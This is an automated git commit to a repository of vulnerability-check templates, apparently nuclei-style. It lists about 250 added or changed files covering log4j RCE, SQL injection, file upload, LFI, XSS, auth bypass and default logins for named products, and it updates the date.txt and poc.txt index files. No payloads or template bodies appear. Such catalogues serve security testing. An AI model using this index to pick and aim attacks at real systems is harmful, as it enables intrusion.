From ca0d737aefb4f8496289ef2fdcd0efbf687d9866 Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Thu, 12 Sep 2024 12:38:40 +0000 Subject: [PATCH] 20240912 --- date.txt | 2 +- poc.txt | 184 ++++++++ poc/apache/apache-impala.yaml | 4 +- poc/apache/apache-zeppelin-unauth.yaml | 45 ++ poc/apache/default-apache-shiro.yaml | 29 ++ poc/api/clickhouse-unauth-api.yaml | 6 +- poc/api/discuz-api-pathinfo.yaml | 41 ++ poc/api/graylog-api-exposure.yaml | 91 ++++ poc/api/seafile-api.yaml | 49 ++ poc/atlassian/bamboo-detect.yaml | 35 ++ poc/atlassian/bitbucket-auth-bypass.yaml | 36 ++ poc/auth/BlindSQLAuth.yaml | 6 +- poc/auth/Devias-kit-register.yaml | 25 ++ poc/auth/Mantis-Default_login.yaml | 4 +- poc/auth/apache-zeppelin-unauth.yaml | 45 ++ poc/auth/bitbucket-auth-bypass.yaml | 36 ++ poc/auth/bloofoxcms-default-login.yaml | 42 ++ poc/auth/casdoor-users-password.yaml | 4 +- poc/auth/chatgpt-web-unauth.yaml | 4 +- poc/auth/clickhouse-unauth-api.yaml | 6 +- poc/auth/dataease-default-login.yaml | 45 ++ .../ecology-verifyquicklogin-auth-bypass.yaml | 38 ++ poc/auth/elasticsearch-default-login.yaml | 53 +++ poc/auth/esafenet-cdg-default-login.yaml | 56 +++ poc/auth/feiyuxing-default-login.yaml | 51 +++ poc/auth/fusionauth-admin-setup.yaml | 4 +- poc/auth/grafana-login-check.yaml | 55 +++ poc/auth/grav-register-admin.yaml | 4 +- poc/auth/kylin-default-login.yaml | 55 +++ poc/auth/leostream-default-login.yaml | 53 +++ poc/auth/nacos-default-login.yaml | 58 +++ poc/auth/nodered-default-login.yaml | 51 +++ poc/auth/pyload-default-login.yaml | 46 ++ poc/auth/splunk-default-login.yaml | 69 +++ poc/auth/teslamate-unauth-access.yaml | 41 ++ poc/auth/tongda-meeting-unauth.yaml | 29 ++ poc/auth/unauth-celery-flower.yaml | 8 +- poc/auth/unauth-temporal-web-ui.yaml | 5 +- poc/auth/unauth-ztp-ping.yaml | 46 ++ poc/auth/weaver-userselect-unauth.yaml | 35 ++ poc/auth/xxljob-executor-unauth.yaml | 81 ++++ poc/cisco/cisco-webex-log4j-rce.yaml | 66 +++ poc/config/dompdf-config.yaml | 5 +- poc/config/joomla-config-dist-file.yaml | 56 ++- poc/config/openstack-config.yaml 
| 41 ++ poc/config/weaver-mysql-config-info-leak.yaml | 30 ++ poc/config/wp-superstorefinder-misconfig.yaml | 33 ++ poc/cve/CVE-2019-25212.yaml | 59 +++ poc/cve/CVE-2023-47115.yaml | 96 ++++ poc/cve/CVE-2024-27199.yaml | 37 ++ poc/cve/CVE-2024-5416.yaml | 59 +++ poc/cve/CVE-2024-6335.yaml | 59 +++ poc/cve/CVE-2024-7626.yaml | 59 +++ poc/cve/CVE-2024-7721.yaml | 59 +++ poc/cve/CVE-2024-7727.yaml | 59 +++ poc/cve/CVE-2024-8045.yaml | 59 +++ poc/cve/CVE-2024-8253.yaml | 59 +++ poc/cve/CVE-2024-8277.yaml | 59 +++ poc/cve/CVE-2024-8440.yaml | 59 +++ ...8522-29b9e24c70ba3cd60461931eec1fd527.yaml | 59 +++ ...8529-e2a9975debb93f28e1a8c207f744d964.yaml | 59 +++ ...8622-0703e404cdba311680d3e36cfe2a24e3.yaml | 59 +++ poc/cve/cve-2018-3714.yaml | 10 +- poc/cve/cve-2020-26876.yaml | 39 +- poc/cve/cve-2021-24276.yaml | 3 +- poc/cve/cve-2022-22963.yaml | 20 +- poc/default/Mantis-Default_login.yaml | 4 +- poc/default/bloofoxcms-default-login.yaml | 42 ++ poc/default/dataease-default-login.yaml | 45 ++ poc/default/default-apache-shiro.yaml | 29 ++ poc/default/elasticsearch-default-login.yaml | 53 +++ poc/default/esafenet-cdg-default-login.yaml | 56 +++ poc/default/feiyuxing-default-login.yaml | 51 +++ poc/default/kylin-default-login.yaml | 55 +++ poc/default/leostream-default-login.yaml | 53 +++ poc/default/nacos-default-login.yaml | 58 +++ poc/default/nodered-default-login.yaml | 51 +++ poc/default/pyload-default-login.yaml | 46 ++ poc/default/splunk-default-login.yaml | 69 +++ poc/detect/4D-detect.yaml | 4 +- poc/detect/bamboo-detect.yaml | 35 ++ poc/detect/burp-collaborator-detect.yaml | 44 ++ poc/detect/casaos-detection.yaml | 31 ++ poc/detect/checkpoint-mobile-detect.yaml | 36 ++ poc/detect/chromecast-detect.yaml | 36 ++ poc/detect/cvsweb-detect.yaml | 45 ++ poc/detect/directus-detect.yaml | 28 ++ poc/detect/element-web-detect.yaml | 36 ++ poc/detect/identity-server-v3-detect.yaml | 38 ++ poc/detect/limesurvey-detect.yaml | 40 ++ poc/detect/matrix-homeserver-detect.yaml | 37 
++ poc/detect/openproject-detect.yaml | 44 ++ poc/detect/phplist-detect.yaml | 42 ++ poc/detect/tibco-businessconnect-detect.yaml | 28 ++ poc/detect/wing-ftp-service-detect.yaml | 25 ++ .../ecology-jqueryfiletree-traversal.yaml | 36 ++ poc/elk/elasticsearch-default-login.yaml | 53 +++ poc/exposed/graylog-api-exposure.yaml | 91 ++++ poc/exposed/rakefile-disclosure.yaml | 40 ++ poc/exposed/request-baskets-exposure.yaml | 4 +- .../sonarqube-projects-disclosure.yaml | 42 ++ poc/exposed/vbulletin-path-disclosure.yaml | 58 +++ poc/exposed/viminfo-disclosure.yaml | 40 ++ poc/exposed/zzzcms-info-disclosure.yaml | 42 ++ poc/ftp/wing-ftp-service-detect.yaml | 25 ++ poc/google/google-secrets.yaml | 16 +- poc/java/default-apache-shiro.yaml | 29 ++ poc/java/tomcat-stacktraces.yaml | 5 +- poc/javascript/custom-css-js-php.yaml | 59 +++ poc/javascript/ojs-installer.yaml | 4 +- poc/joomla/joomla-config-dist-file.yaml | 56 ++- poc/local_file_inclusion/acti-video-lfi.yaml | 39 ++ .../kingsoft-vgm-lfi.yaml | 39 ++ .../sangfor-ngaf-lfi.yaml | 42 ++ .../weaver-officeserver-lfi.yaml | 35 ++ .../weaver-signaturedownload-lfi.yaml | 42 ++ .../weaver-sptmforportalthumbnail-lfi.yaml | 41 ++ .../yonyou-ufida-nc-lfi.yaml | 34 ++ poc/microsoft/74cms-weixin-sqli.yaml | 39 ++ .../Hikvision_iVMS-8700_upload_action.yaml | 40 +- poc/microsoft/bloofoxcms-default-login.yaml | 42 ++ poc/microsoft/ms-exchange-user-enum.yaml | 5 +- poc/microsoft/yzmcms-installer.yaml | 4 +- poc/microsoft/zzzcms-info-disclosure.yaml | 42 ++ poc/mysql/mysql-history.yaml | 54 +++ poc/mysql/weaver-mysql-config-info-leak.yaml | 30 ++ poc/nodejs/nodered-default-login.yaml | 51 +++ poc/oracle/xss-oracle.yaml | 22 + poc/other/12.1.1.2.yaml | 59 +++ poc/other/12.1.1.yaml | 64 +++ poc/other/3867691789.yaml | 68 ++- poc/other/5.1.5.yaml | 141 ++++++ poc/other/5.3.3.1.yaml | 54 +++ poc/other/8.2.1.yaml | 28 ++ poc/other/9.1.2.yaml | 425 ++++++++++++++++++ poc/other/advanced-backgrounds.yaml | 59 +++ poc/other/alma-installer.yaml | 4 
+- ...maps-4b370fcafcc0619a561d13639d3f142f.yaml | 59 +++ poc/other/bitrix24-installer.yaml | 4 +- poc/other/booked-export-csv.yaml | 50 +++ poc/other/caldera-c2.yaml | 33 ++ poc/other/chamilo-installer.yaml | 5 +- poc/other/clipbucket-installer.yaml | 4 +- poc/other/codeigniter-errorpage.yaml | 4 +- poc/other/combodo-itop-installer.yaml | 4 +- poc/other/connectwise-setup.yaml | 30 ++ poc/other/discuz-panel.yaml | 39 ++ poc/other/dokuwiki-panel.yaml | 4 +- poc/other/dolphin-installer.yaml | 4 +- poc/other/espocrm-installer.yaml | 29 ++ poc/other/graylog-panel.yaml | 28 ++ poc/other/h2o-dashboard.yaml | 39 ++ poc/other/knowledgetree-installer.yaml | 29 ++ ...ress-5c26a1848cda845d9b97374472d49eb0.yaml | 59 +++ ...ress-fcb8158f71307795525b9840bda82742.yaml | 59 +++ poc/other/magnolia-installer.yaml | 4 +- poc/other/mantisbt-installer.yaml | 4 +- poc/other/mosparo-install.yaml | 4 +- poc/other/orangescrum-install.yaml | 4 +- poc/other/ords-panel.yaml | 18 + poc/other/perfsonar-toolkit.yaml | 4 +- poc/other/posteio-admin-panel.yaml | 4 +- poc/other/sharefile-storage-server.yaml | 32 ++ poc/other/shopware-installer.yaml | 4 +- poc/other/smokeping-grapher.yaml | 4 +- poc/other/softether-vpn-panel.yaml | 4 +- poc/other/spa-cart-installer.yaml | 32 ++ poc/other/sugarcrm-install.yaml | 4 +- poc/other/tautulli-install.yaml | 4 +- poc/other/tongda-video-file-read.yaml | 33 ++ poc/other/untangle-admin-setup.yaml | 4 +- poc/other/wechat-info-leak.yaml | 31 ++ .../yonyou-nc-baseapp-deserialization.yaml | 28 ++ poc/other/yonyou-nc-info-leak.yaml | 35 ++ poc/other/zencart-installer.yaml | 4 +- poc/php/custom-css-js-php.yaml | 59 +++ poc/php/phpgedview-installer.yaml | 32 ++ poc/php/phplist-detect.yaml | 42 ++ poc/php/phpsys-info.yaml | 33 ++ poc/php/thinkphp-errors.yaml | 4 +- .../Hikvision_applyCT_RCE.yaml | 45 +- .../cisco-webex-log4j-rce.yaml | 66 +++ .../citrix-xenapp-log4j-rce.yaml | 66 +++ .../flexnet-log4j-rce.yaml | 65 +++ poc/remote_code_execution/flir-ax8-rce.yaml | 60 
+++ .../manage-engine-dc-log4j-rce.yaml | 65 +++ .../openshift-log4j-rce.yaml | 65 +++ .../papercut-log4j-rce.yaml | 65 +++ .../ruijie-nmc-sync-rce.yaml | 40 ++ .../symantec-sepm-log4j-rce.yaml | 67 +++ .../tongda-getdata-rce.yaml | 37 ++ .../weaver-ecology-bshservlet-rce.yaml | 43 ++ .../woocommerce-photo-reviews.yaml | 59 +++ .../wp-social-warfare-rce.yaml | 44 ++ .../yonyou-nc-ncmessageservlet-rce.yaml | 45 ++ poc/search/elasticsearch-default-login.yaml | 53 +++ poc/social/wp-social-warfare-rce.yaml | 44 ++ poc/sql/74cms-weixin-sqli.yaml | 39 ++ ...8622-0703e404cdba311680d3e36cfe2a24e3.yaml | 59 +++ poc/sql/SQLNet-log.yaml | 18 + poc/sql/ecology-oa-file-sqli.yaml | 43 ++ poc/sql/ecology-sqli2.yaml | 6 +- poc/sql/mysql-history.yaml | 54 +++ poc/sql/odoo-unprotected-database.yaml | 32 ++ poc/sql/sql-server-report-viewer.yaml | 4 +- poc/sql/tongda-insert-sqli.yaml | 47 ++ poc/sql/tongda-report-func-sqli.yaml | 39 ++ poc/sql/weaver-checkserver-sqli.yaml | 32 ++ poc/sql/weaver-ecology-getsqldata-sqli.yaml | 40 ++ poc/sql/weaver-ecology-hrmcareer-sqli.yaml | 36 ++ poc/sql/weaver-mysql-config-info-leak.yaml | 30 ++ poc/sql_injection/74cms-weixin-sqli.yaml | 39 ++ poc/sql_injection/SQLNet-log.yaml | 18 + poc/sql_injection/ecology-oa-file-sqli.yaml | 43 ++ poc/sql_injection/ecology-sqli2.yaml | 6 +- poc/sql_injection/mysql-history.yaml | 54 +++ .../sql-server-report-viewer.yaml | 4 +- poc/sql_injection/tongda-insert-sqli.yaml | 47 ++ .../tongda-report-func-sqli.yaml | 39 ++ .../weaver-checkserver-sqli.yaml | 32 ++ .../weaver-ecology-getsqldata-sqli.yaml | 40 ++ .../weaver-ecology-hrmcareer-sqli.yaml | 36 ++ .../weaver-mysql-config-info-leak.yaml | 30 ++ poc/ssrf/office-webapps-ssrf.yaml | 6 +- .../Hikvision_iVMS-8700_upload_action.yaml | 40 +- .../Nsfocus_NF_Firewall_FileUpload.yaml | 65 ++- poc/upload/Ruijie_NBR_Router_fileupload.yaml | 30 +- poc/upload/weaver-eoffice-file-upload.yaml | 61 +++ .../weaver-ktreeuploadaction-file-upload.yaml | 57 +++ 
.../weaver-uploadoperation-file-upload.yaml | 77 ++++ poc/upload/wp-gallery-file-upload.yaml | 48 ++ .../yonyou-nc-dispatcher-fileupload.yaml | 38 ++ .../yonyou-nc-grouptemplet-fileupload.yaml | 52 +-- .../vmware-operation-manager-log4j.yaml | 21 +- poc/web/chatgpt-web-unauth.yaml | 4 +- poc/web/cisco-webex-log4j-rce.yaml | 66 +++ poc/web/cvsweb-detect.yaml | 45 ++ poc/web/element-web-detect.yaml | 36 ++ poc/web/office-webapps-ssrf.yaml | 6 +- poc/web/unauth-temporal-web-ui.yaml | 5 +- poc/web/webcalendar-install.yaml | 4 +- poc/web/webtrees-install.yaml | 4 +- poc/wordpress/wp-gallery-file-upload.yaml | 48 ++ poc/wordpress/wp-real-estate-xss.yaml | 37 ++ poc/wordpress/wp-social-warfare-rce.yaml | 44 ++ .../wp-superstorefinder-misconfig.yaml | 33 ++ poc/xss/beyond-trust-xss.yaml | 31 ++ poc/xss/junos-xss.yaml | 51 +++ poc/xss/photoblocks-grid-gallery-xss.yaml | 35 ++ poc/xss/sitecore-xml-xss.yaml | 39 ++ poc/xss/wp-real-estate-xss.yaml | 37 ++ poc/xss/xss-oracle.yaml | 22 + 252 files changed, 9412 insertions(+), 384 deletions(-) create mode 100644 poc/apache/apache-zeppelin-unauth.yaml create mode 100644 poc/apache/default-apache-shiro.yaml create mode 100644 poc/api/discuz-api-pathinfo.yaml create mode 100644 poc/api/graylog-api-exposure.yaml create mode 100644 poc/api/seafile-api.yaml create mode 100644 poc/atlassian/bamboo-detect.yaml create mode 100644 poc/atlassian/bitbucket-auth-bypass.yaml create mode 100644 poc/auth/Devias-kit-register.yaml create mode 100644 poc/auth/apache-zeppelin-unauth.yaml create mode 100644 poc/auth/bitbucket-auth-bypass.yaml create mode 100644 poc/auth/bloofoxcms-default-login.yaml create mode 100644 poc/auth/dataease-default-login.yaml create mode 100755 poc/auth/ecology-verifyquicklogin-auth-bypass.yaml create mode 100644 poc/auth/elasticsearch-default-login.yaml create mode 100644 poc/auth/esafenet-cdg-default-login.yaml create mode 100644 poc/auth/feiyuxing-default-login.yaml create mode 100644 poc/auth/grafana-login-check.yaml 
create mode 100644 poc/auth/kylin-default-login.yaml create mode 100644 poc/auth/leostream-default-login.yaml create mode 100644 poc/auth/nacos-default-login.yaml create mode 100644 poc/auth/nodered-default-login.yaml create mode 100644 poc/auth/pyload-default-login.yaml create mode 100644 poc/auth/splunk-default-login.yaml create mode 100644 poc/auth/teslamate-unauth-access.yaml create mode 100755 poc/auth/tongda-meeting-unauth.yaml create mode 100644 poc/auth/unauth-ztp-ping.yaml create mode 100755 poc/auth/weaver-userselect-unauth.yaml create mode 100644 poc/auth/xxljob-executor-unauth.yaml create mode 100644 poc/cisco/cisco-webex-log4j-rce.yaml mode change 100755 => 100644 poc/config/joomla-config-dist-file.yaml create mode 100644 poc/config/openstack-config.yaml create mode 100644 poc/config/weaver-mysql-config-info-leak.yaml create mode 100644 poc/config/wp-superstorefinder-misconfig.yaml create mode 100644 poc/cve/CVE-2019-25212.yaml create mode 100644 poc/cve/CVE-2023-47115.yaml create mode 100644 poc/cve/CVE-2024-27199.yaml create mode 100644 poc/cve/CVE-2024-5416.yaml create mode 100644 poc/cve/CVE-2024-6335.yaml create mode 100644 poc/cve/CVE-2024-7626.yaml create mode 100644 poc/cve/CVE-2024-7721.yaml create mode 100644 poc/cve/CVE-2024-7727.yaml create mode 100644 poc/cve/CVE-2024-8045.yaml create mode 100644 poc/cve/CVE-2024-8253.yaml create mode 100644 poc/cve/CVE-2024-8277.yaml create mode 100644 poc/cve/CVE-2024-8440.yaml create mode 100644 poc/cve/CVE-2024-8522-29b9e24c70ba3cd60461931eec1fd527.yaml create mode 100644 poc/cve/CVE-2024-8529-e2a9975debb93f28e1a8c207f744d964.yaml create mode 100644 poc/cve/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml create mode 100644 poc/default/bloofoxcms-default-login.yaml create mode 100644 poc/default/dataease-default-login.yaml create mode 100644 poc/default/default-apache-shiro.yaml create mode 100644 poc/default/elasticsearch-default-login.yaml create mode 100644 
poc/default/esafenet-cdg-default-login.yaml create mode 100644 poc/default/feiyuxing-default-login.yaml create mode 100644 poc/default/kylin-default-login.yaml create mode 100644 poc/default/leostream-default-login.yaml create mode 100644 poc/default/nacos-default-login.yaml create mode 100644 poc/default/nodered-default-login.yaml create mode 100644 poc/default/pyload-default-login.yaml create mode 100644 poc/default/splunk-default-login.yaml create mode 100644 poc/detect/bamboo-detect.yaml create mode 100644 poc/detect/burp-collaborator-detect.yaml create mode 100644 poc/detect/casaos-detection.yaml create mode 100644 poc/detect/checkpoint-mobile-detect.yaml create mode 100644 poc/detect/chromecast-detect.yaml create mode 100644 poc/detect/cvsweb-detect.yaml create mode 100644 poc/detect/directus-detect.yaml create mode 100644 poc/detect/element-web-detect.yaml create mode 100644 poc/detect/identity-server-v3-detect.yaml create mode 100644 poc/detect/limesurvey-detect.yaml create mode 100644 poc/detect/matrix-homeserver-detect.yaml create mode 100644 poc/detect/openproject-detect.yaml create mode 100644 poc/detect/phplist-detect.yaml create mode 100644 poc/detect/tibco-businessconnect-detect.yaml create mode 100644 poc/detect/wing-ftp-service-detect.yaml create mode 100755 poc/directory_listing/ecology-jqueryfiletree-traversal.yaml create mode 100644 poc/elk/elasticsearch-default-login.yaml create mode 100644 poc/exposed/graylog-api-exposure.yaml create mode 100644 poc/exposed/rakefile-disclosure.yaml create mode 100644 poc/exposed/sonarqube-projects-disclosure.yaml create mode 100644 poc/exposed/vbulletin-path-disclosure.yaml create mode 100644 poc/exposed/viminfo-disclosure.yaml create mode 100644 poc/exposed/zzzcms-info-disclosure.yaml create mode 100644 poc/ftp/wing-ftp-service-detect.yaml create mode 100644 poc/java/default-apache-shiro.yaml create mode 100644 poc/javascript/custom-css-js-php.yaml mode change 100755 => 100644 
poc/joomla/joomla-config-dist-file.yaml create mode 100644 poc/local_file_inclusion/acti-video-lfi.yaml create mode 100644 poc/local_file_inclusion/kingsoft-vgm-lfi.yaml create mode 100644 poc/local_file_inclusion/sangfor-ngaf-lfi.yaml create mode 100755 poc/local_file_inclusion/weaver-officeserver-lfi.yaml create mode 100755 poc/local_file_inclusion/weaver-signaturedownload-lfi.yaml create mode 100755 poc/local_file_inclusion/weaver-sptmforportalthumbnail-lfi.yaml create mode 100644 poc/local_file_inclusion/yonyou-ufida-nc-lfi.yaml create mode 100644 poc/microsoft/74cms-weixin-sqli.yaml create mode 100644 poc/microsoft/bloofoxcms-default-login.yaml create mode 100644 poc/microsoft/zzzcms-info-disclosure.yaml create mode 100644 poc/mysql/mysql-history.yaml create mode 100644 poc/mysql/weaver-mysql-config-info-leak.yaml create mode 100644 poc/nodejs/nodered-default-login.yaml create mode 100644 poc/oracle/xss-oracle.yaml create mode 100644 poc/other/12.1.1.2.yaml create mode 100644 poc/other/12.1.1.yaml create mode 100644 poc/other/5.1.5.yaml create mode 100644 poc/other/5.3.3.1.yaml create mode 100644 poc/other/8.2.1.yaml create mode 100644 poc/other/9.1.2.yaml create mode 100644 poc/other/advanced-backgrounds.yaml create mode 100644 poc/other/amcharts-charts-and-maps-4b370fcafcc0619a561d13639d3f142f.yaml create mode 100644 poc/other/booked-export-csv.yaml create mode 100644 poc/other/caldera-c2.yaml create mode 100644 poc/other/connectwise-setup.yaml create mode 100644 poc/other/discuz-panel.yaml create mode 100644 poc/other/espocrm-installer.yaml create mode 100644 poc/other/graylog-panel.yaml create mode 100644 poc/other/h2o-dashboard.yaml create mode 100644 poc/other/knowledgetree-installer.yaml create mode 100644 poc/other/learnpress-5c26a1848cda845d9b97374472d49eb0.yaml create mode 100644 poc/other/learnpress-fcb8158f71307795525b9840bda82742.yaml create mode 100644 poc/other/ords-panel.yaml create mode 100644 poc/other/sharefile-storage-server.yaml create 
mode 100644 poc/other/spa-cart-installer.yaml create mode 100755 poc/other/tongda-video-file-read.yaml create mode 100644 poc/other/wechat-info-leak.yaml create mode 100755 poc/other/yonyou-nc-baseapp-deserialization.yaml create mode 100644 poc/other/yonyou-nc-info-leak.yaml create mode 100644 poc/php/custom-css-js-php.yaml create mode 100644 poc/php/phpgedview-installer.yaml create mode 100644 poc/php/phplist-detect.yaml create mode 100644 poc/php/phpsys-info.yaml create mode 100644 poc/remote_code_execution/cisco-webex-log4j-rce.yaml create mode 100644 poc/remote_code_execution/citrix-xenapp-log4j-rce.yaml create mode 100644 poc/remote_code_execution/flexnet-log4j-rce.yaml create mode 100644 poc/remote_code_execution/flir-ax8-rce.yaml create mode 100644 poc/remote_code_execution/manage-engine-dc-log4j-rce.yaml create mode 100644 poc/remote_code_execution/openshift-log4j-rce.yaml create mode 100644 poc/remote_code_execution/papercut-log4j-rce.yaml create mode 100644 poc/remote_code_execution/ruijie-nmc-sync-rce.yaml create mode 100644 poc/remote_code_execution/symantec-sepm-log4j-rce.yaml create mode 100755 poc/remote_code_execution/tongda-getdata-rce.yaml create mode 100755 poc/remote_code_execution/weaver-ecology-bshservlet-rce.yaml create mode 100644 poc/remote_code_execution/woocommerce-photo-reviews.yaml create mode 100644 poc/remote_code_execution/wp-social-warfare-rce.yaml create mode 100644 poc/remote_code_execution/yonyou-nc-ncmessageservlet-rce.yaml create mode 100644 poc/search/elasticsearch-default-login.yaml create mode 100644 poc/social/wp-social-warfare-rce.yaml create mode 100644 poc/sql/74cms-weixin-sqli.yaml create mode 100644 poc/sql/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml create mode 100644 poc/sql/SQLNet-log.yaml create mode 100644 poc/sql/ecology-oa-file-sqli.yaml create mode 100644 poc/sql/mysql-history.yaml create mode 100644 poc/sql/odoo-unprotected-database.yaml create mode 100755 poc/sql/tongda-insert-sqli.yaml create mode 
100755 poc/sql/tongda-report-func-sqli.yaml create mode 100644 poc/sql/weaver-checkserver-sqli.yaml create mode 100755 poc/sql/weaver-ecology-getsqldata-sqli.yaml create mode 100755 poc/sql/weaver-ecology-hrmcareer-sqli.yaml create mode 100644 poc/sql/weaver-mysql-config-info-leak.yaml create mode 100644 poc/sql_injection/74cms-weixin-sqli.yaml create mode 100644 poc/sql_injection/SQLNet-log.yaml create mode 100644 poc/sql_injection/ecology-oa-file-sqli.yaml create mode 100644 poc/sql_injection/mysql-history.yaml create mode 100755 poc/sql_injection/tongda-insert-sqli.yaml create mode 100755 poc/sql_injection/tongda-report-func-sqli.yaml create mode 100644 poc/sql_injection/weaver-checkserver-sqli.yaml create mode 100755 poc/sql_injection/weaver-ecology-getsqldata-sqli.yaml create mode 100755 poc/sql_injection/weaver-ecology-hrmcareer-sqli.yaml create mode 100644 poc/sql_injection/weaver-mysql-config-info-leak.yaml create mode 100644 poc/upload/weaver-eoffice-file-upload.yaml create mode 100755 poc/upload/weaver-ktreeuploadaction-file-upload.yaml create mode 100755 poc/upload/weaver-uploadoperation-file-upload.yaml create mode 100644 poc/upload/wp-gallery-file-upload.yaml create mode 100755 poc/upload/yonyou-nc-dispatcher-fileupload.yaml mode change 100644 => 100755 poc/upload/yonyou-nc-grouptemplet-fileupload.yaml create mode 100644 poc/web/cisco-webex-log4j-rce.yaml create mode 100644 poc/web/cvsweb-detect.yaml create mode 100644 poc/web/element-web-detect.yaml create mode 100644 poc/wordpress/wp-gallery-file-upload.yaml create mode 100644 poc/wordpress/wp-real-estate-xss.yaml create mode 100644 poc/wordpress/wp-social-warfare-rce.yaml create mode 100644 poc/wordpress/wp-superstorefinder-misconfig.yaml create mode 100644 poc/xss/beyond-trust-xss.yaml create mode 100644 poc/xss/junos-xss.yaml create mode 100644 poc/xss/photoblocks-grid-gallery-xss.yaml create mode 100644 poc/xss/sitecore-xml-xss.yaml create mode 100644 poc/xss/wp-real-estate-xss.yaml create mode 
100644 poc/xss/xss-oracle.yaml
diff --git a/date.txt b/date.txt
index 2abf40291e..8dcf10768e 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20240911
+20240912
diff --git a/poc.txt b/poc.txt
index f56864bfcc..2eedc14fb3 100644
--- a/poc.txt
+++ b/poc.txt
@@ -495,6 +495,7 @@
 ./poc/apache/apache-wicket.yaml
 ./poc/apache/apache-workflow.yaml
 ./poc/apache/apache-zeppelin-detect.yaml
+./poc/apache/apache-zeppelin-unauth.yaml
 ./poc/apache/apache2-ubuntu默认页面.yaml
 ./poc/apache/apachesolr-ssrf-1.yaml
 ./poc/apache/apachesolr-ssrf-2.yaml
@@ -506,6 +507,7 @@
 ./poc/apache/apachestruts-rce.yaml
 ./poc/apache/askapache-firefox-adsense-f97340f5d88b3c5e1859d992075304c3.yaml
 ./poc/apache/askapache-firefox-adsense.yaml
+./poc/apache/default-apache-shiro.yaml
 ./poc/apache/default-apache-test-all-6812.yaml
 ./poc/apache/default-apache-test-all-6813.yaml
 ./poc/apache/default-apache-test-all-6814.yaml
@@ -1033,6 +1035,7 @@
 ./poc/api/custom-logapi-log-detect.yaml
 ./poc/api/databricks-api-token.yaml
 ./poc/api/discord-api-token.yaml
+./poc/api/discuz-api-pathinfo.yaml
 ./poc/api/docker-api-detection.yaml
 ./poc/api/docker-api-unauthorized-rce.yaml
 ./poc/api/docker-api-unauthorized-rce.yml
@@ -1137,6 +1140,7 @@
 ./poc/api/graylog-api-browser-7847.yaml
 ./poc/api/graylog-api-browser-7848.yaml
 ./poc/api/graylog-api-browser.yaml
+./poc/api/graylog-api-exposure.yaml
 ./poc/api/hardcoded-api-keys.yaml
 ./poc/api/heroku-api-key.yaml
 ./poc/api/hidden-api-endpoint-discovery.yaml
@@ -1297,6 +1301,7 @@
 ./poc/api/s3-sensitive-api.yaml
 ./poc/api/sapido-router-rce.yaml
 ./poc/api/seacms-v101v11-comment-api-sqli.yaml
+./poc/api/seafile-api.yaml
 ./poc/api/segment-public-api.yaml
 ./poc/api/sema-api-b9fc11c70eceb7a7923754c656c28f17.yaml
 ./poc/api/sema-api.yaml
@@ -1539,7 +1544,9 @@
 ./poc/atlassian/atlassian-token.yaml
 ./poc/atlassian/bamboo-columns-e2d997f74c42c2c8a5f10e34c8968b13.yaml
 ./poc/atlassian/bamboo-columns.yaml
+./poc/atlassian/bamboo-detect.yaml
 ./poc/atlassian/bamboocloud-bim.yaml
+./poc/atlassian/bitbucket-auth-bypass.yaml
 ./poc/atlassian/bitbucket-client-id.yaml
 ./poc/atlassian/bitbucket-client-secret.yaml
 ./poc/atlassian/bitbucket-pipelines.yaml
@@ -1669,6 +1676,7 @@
 ./poc/auth/Chinaunicom-Default-Login.yaml
 ./poc/auth/Cloudify-login.yaml
 ./poc/auth/Dahua_DSS_resetPassword.yaml
+./poc/auth/Devias-kit-register.yaml
 ./poc/auth/Discuz-WechatPlugins-Unauth.yaml
 ./poc/auth/Discuz-unauthorized-tools.yaml
 ./poc/auth/DocCMS-keyword-SQL.yaml
@@ -1981,6 +1989,7 @@
 ./poc/auth/apache-storm-unauthorized-access.yml
 ./poc/auth/apache-superset-login-extended.yaml
 ./poc/auth/apache-tomcat-snoop-cookie-handling.yaml
+./poc/auth/apache-zeppelin-unauth.yaml
 ./poc/auth/apc-login.yaml
 ./poc/auth/apc-ups-login-381.yaml
 ./poc/auth/apc-ups-login-382.yaml
@@ -2203,6 +2212,7 @@
 ./poc/auth/biometric-login-for-woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/auth/biometric-login-for-woocommerce-plugin.yaml
 ./poc/auth/biometric-login-for-woocommerce.yaml
+./poc/auth/bitbucket-auth-bypass.yaml
 ./poc/auth/bitbucket-client-secret.yaml
 ./poc/auth/bithighway-default-password.yaml
 ./poc/auth/bitly-secret-key-742.yaml
@@ -2218,6 +2228,7 @@
 ./poc/auth/block-wp-login.yaml
 ./poc/auth/blogintroduction-wordpress-plugin-a64dfdb35a4384acb2d4d68e05f08394.yaml
 ./poc/auth/blogintroduction-wordpress-plugin.yaml
+./poc/auth/bloofoxcms-default-login.yaml
 ./poc/auth/bloofoxcms-login-panel.yaml
 ./poc/auth/blossom-recipe-maker-7d7cba846a8d83d7b462e51f147c77d9.yaml
 ./poc/auth/blossom-recipe-maker.yaml
@@ -2616,6 +2627,7 @@
 ./poc/auth/datadog-access-token.yaml
 ./poc/auth/datadog-login-check.yaml
 ./poc/auth/datadog-login.yaml
+./poc/auth/dataease-default-login.yaml
 ./poc/auth/datahub-metadata-default-login.yaml
 ./poc/auth/dataiku-default-login.yaml
 ./poc/auth/datang-ac-default-password-cnvd-2021-04128.yaml
@@ -2817,6 +2829,7 @@
 ./poc/auth/easypost-api-token.yaml
 ./poc/auth/easypost-test-token.yaml
 ./poc/auth/ecology-loginSSO-sql-CNVD-2021-33202.yaml
+./poc/auth/ecology-verifyquicklogin-auth-bypass.yaml
 ./poc/auth/ecommerce-two-factor-authentication-46bf8f18c41520a2827c86f143a0c89f.yaml
 ./poc/auth/ecommerce-two-factor-authentication-4ee80c1b7102fd5161cfdab0342bcf79.yaml
 ./poc/auth/ecommerce-two-factor-authentication-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -2827,6 +2840,7 @@
 ./poc/auth/edgeos-login.yaml
 ./poc/auth/efak-login-panel.yaml
 ./poc/auth/eko-management-console-login.yaml
+./poc/auth/elasticsearch-default-login.yaml
 ./poc/auth/elasticsearch-unauth.yaml
 ./poc/auth/elasticsearch-unauth.yml
 ./poc/auth/elasticsearch-unauthorized-access.yaml
@@ -2868,6 +2882,7 @@
 ./poc/auth/erident-custom-login-and-dashboard-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/auth/erident-custom-login-and-dashboard-plugin.yaml
 ./poc/auth/erident-custom-login-and-dashboard.yaml
+./poc/auth/esafenet-cdg-default-login.yaml
